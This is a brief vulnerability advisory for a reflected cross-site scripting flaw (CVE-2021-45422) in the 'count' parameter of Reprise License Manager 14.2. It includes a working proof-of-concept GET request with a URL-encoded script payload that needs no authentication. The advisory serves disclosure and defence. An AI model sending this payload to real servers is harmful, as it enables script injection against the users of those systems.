<pre><code># Product: RLM 14.2<br /># Vendor: Reprise Software<br /># CVE ID: CVE-2021-45422<br /># Vulnerability Title: Reflected Cross-Site Scripting<br /># Severity: Medium<br /># Author(s): Giulia Melotti Garibaldi<br /># Date: 2022-01-11<br />#<br />#############################################################<br />Introduction:<br />Reprise License Manager 14.2 is affected by a reflected cross-site scripting (XSS) vulnerability in the "count" parameter of /goform/activate_process, which is passed via GET. No authentication is required.<br /><br />Vulnerability PoC:<br /><br />GET http://HOST:5054/goform/activate_process?isv=&akey=&hostid=&count=%3Cscript%3Ealert(%221%22)%3C/script%3E HTTP/1.1<br />Host: HOST:5054<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate, br<br />Connection: keep-alive<br /><br /></code></pre>